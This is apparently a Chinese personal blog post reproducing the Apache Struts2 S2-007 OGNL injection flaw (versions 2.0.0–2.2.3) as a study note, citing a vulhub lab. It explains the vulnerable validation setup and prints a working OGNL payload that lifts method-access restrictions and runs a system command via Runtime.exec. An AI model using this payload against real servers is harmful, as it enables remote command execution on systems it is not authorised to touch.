S2-007 远程代码执行漏洞

字数:322字 | 预计阅读时长:1分钟

背景

当配置了验证规则 -validation.xml 时,若类型验证转换出错,后端默认会将用户提交的表单值通过字符串拼接,然后执行一次 OGNL 表达式解析并返回。

影响版本:

​ 2.0.0 - 2.2.3

复现过程

例如有 UserAction:

1
2
3
4
5
6
7
(...)
public class UserAction extends ActionSupport {
	private Integer age;
	private String name;
	private String email;

(...)

然后配置有 UserAction-validation.xml:

1
2
3
4
5
6
7
8
9
10
11
12
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE validators PUBLIC
	"-//OpenSymphony Group//XWork Validator 1.0//EN"
	"http://www.opensymphony.com/xwork/xwork-validator-1.0.2.dtd">
<validators>
	<field name="age">
		<field-validator type="int">
			<param name="min">1</param>
			<param name="max">150</param>
		</field-validator>
	</field>
</validators>

当用户提交 age 为字符串而非整形数值时,后端用代码拼接 "'" + value + "'" 然后对其进行 OGNL 表达式解析。要成功利用,只需要找到一个配置了类似验证规则的表单字段使之转换出错,借助类似 SQLi 注入单引号拼接的方式即可注入任意 OGNL 表达式。

POC:

1
' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('id').getInputStream())) + '

参考文章

http://github.com/vulhub/vulhub/blob/master/struts2/s2-007/README.zh-cn.md/

谢谢你请我吃糖果

微信

扫一扫,分享到微信

微信分享二维码
载入天数...载入时分秒...

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

作者是一个极其低调,而又不失内涵的人。 <br> 只因年少轻狂,不知少壮不努力,老大徒伤悲之意,错失高考。 <br> 至此,以“学到老,活到老”,树立终生学习之观念。 <br> 所谓好记性不如烂笔头,我将所学技术记载于此博客。 <br> 此博客就当作是我的学习笔记。 <br> 方便日后复习总结。 <br> 转眼,光阴数十载, <br> 本人已踏入老男人之行列。 <br> 深夜流泪, <br> 往日不堪回首。 <br> 时至今日, <br> 往事已去。 <br> 目光向前, <br> 不负余生。